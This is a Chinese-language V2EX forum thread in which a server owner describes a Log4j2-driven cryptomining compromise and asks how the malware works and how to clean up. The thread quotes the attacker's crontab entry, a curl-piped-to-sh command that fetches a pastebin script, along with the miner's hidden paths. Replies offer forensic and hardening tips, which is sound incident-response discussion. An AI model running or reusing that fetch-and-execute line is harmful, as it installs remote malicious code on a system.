服务器被挖矿,找到相关文件及计划任务, google 过关键词得知是 Log4j2 漏洞导致被入侵,想知道该病毒运行的逻辑,找不到相关 sh 文件,求大佬指点。

2022-04-06 17:07:22 +08:00
 callmebigfaceman

环境介绍: 1 、redhat 6.3 2 、对外开启了 9000:80 端口的映射 3 、强密码验证(限制指定 IP 通过 ssh 连接)

已知信息: 1 、crontab -l 得知被添加了计划任务:curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh (我尝试得到该脚本,但是请求出来只是字符串‘#endif’,我该如何得到该病毒脚本? top 查看进程时候有看到 /tmp/.mimu/apache.sh ,但是实际去查看该病毒目录,并没有发现脚本,是否加载在内存中,实际脚本已被删除?) https://imgur.com/Huflmd7 https://imgur.com/2PZNjXR

2 、已知该脚本会生成隐藏目录 /tmp/.mimu/,下面包含挖矿程序 kthmimu 及配置文件 config.json https://imgur.com/Huflmd7

已自行尝试复现的测试: 1 、尝试 curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh ,但是我并没有发现脚本文件及复现

求助: 1 、如何找出该脚本及实现逻辑? 2 、如何防范?

3546 次点击
所在节点    Linux
15 条回复
aaa5838769
2022-04-06 17:14:42 +08:00
你的项目是在宿主机运行还是容器内,如果是在容器内,去容器的目录下看看。
callmebigfaceman
2022-04-06 17:17:18 +08:00
@aaa5838769 宿主机内
Jinnyu
2022-04-06 17:34:35 +08:00
看样子应该是 https://pastebin.com/raw/8DdBvkRn 被访问后, 服务端删除了里边的内容,
防止脚本内容泄露

可以分析下 apache.sh 的脚本内容 看看都连接了哪些端口
1. 先禁止下端口访问
2. 通过 chattr 修改文件权限, 禁止写入 /tmp/.mimu
3. 复查所有常用二进制文件 MD5 (cd, mv, cp, ps, ls, top 等)
polaa
2022-04-06 17:56:49 +08:00
1.检测是否存在自启动脚本
2. 尝试恢复删除的脚本
关键词
recover deleted file active process
recover deleted file
defunct9
2022-04-06 18:03:05 +08:00
保护现场不够啊。
defunct9
2022-04-06 18:03:16 +08:00
开 ssh ,让我上去看看
meetcw
2022-04-06 18:35:41 +08:00
进程没关掉的话可以通过 proc/{pid}/exe 文件恢复执行文件,另外 proc/{pid}/fd 下是这个进程打开的文件。
wd
2022-04-06 19:19:44 +08:00
别折腾了,遇到这样的一般就重建吧,你不知道对方埋了多少后门的。
idragonet
2022-04-06 20:32:52 +08:00
今晚我的腾讯云服务器也收到服务器被挖矿警告了。
callmebigfaceman
2022-04-06 21:34:34 +08:00
@Jinnyu 1 、2 都已做了,我仔细查查 3 ,感谢
callmebigfaceman
2022-04-06 21:35:15 +08:00
@polaa 1.已检查自启动的相关项目 2.我尝试一下,感谢
callmebigfaceman
2022-04-06 21:35:51 +08:00
@defunct9 现场已经被我清理过了,不是很方便提供 ssh ,不好意思。
callmebigfaceman
2022-04-06 21:41:16 +08:00
@meetcw 被我关了,exe 是 /bin/sh
callmebigfaceman
2022-04-06 21:56:39 +08:00
@wd 主要想了解它如何实现的
Chaconne
2022-04-07 15:49:35 +08:00
@idragonet 我用 GCP 从没有过,是安全性不一样?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/845286

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX